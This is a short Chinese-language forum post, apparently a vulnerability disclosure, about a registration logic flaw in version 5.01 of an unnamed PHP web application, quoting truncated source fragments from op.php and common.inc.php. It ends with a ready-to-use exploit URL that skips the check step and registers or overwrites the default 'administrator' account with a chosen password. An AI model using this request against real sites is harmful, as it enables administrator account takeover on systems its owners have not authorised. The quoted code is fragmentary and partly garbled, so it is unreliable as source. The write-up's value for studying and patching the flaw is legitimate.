原作者:心灵
漏洞发现在最新版本:5.01,旧版本没源码,不知是否存在。
还是那句话,看代码……
看文件:op.php: <?php |
这里简单得很,看下:“common.inc.php”。
主要代码: $prev=$_SERVER['HTTP_REFERER']; |
这里就是:“op.php?op=register”,载入的,看“op.php”那文件就知,简单得很……,还是那句,看代码。
以下是引用片段: <?php if ($act=="check") { //主要问题在这里...上面common.inc.php说了act是_GET的 如果act不等于check呢?那就不用检测了.............. if ($act=="reg") { //悲剧了....他真以为所有人都按照他脚本的路去走。。。 |
EXP: op.php?op=register&act=reg&uname=administrator&unick=admin&mail=xinling@t00ls.net&pass1=admin&pass2=admin “administrator”是默认管理员账号,当然可以修改其他。 |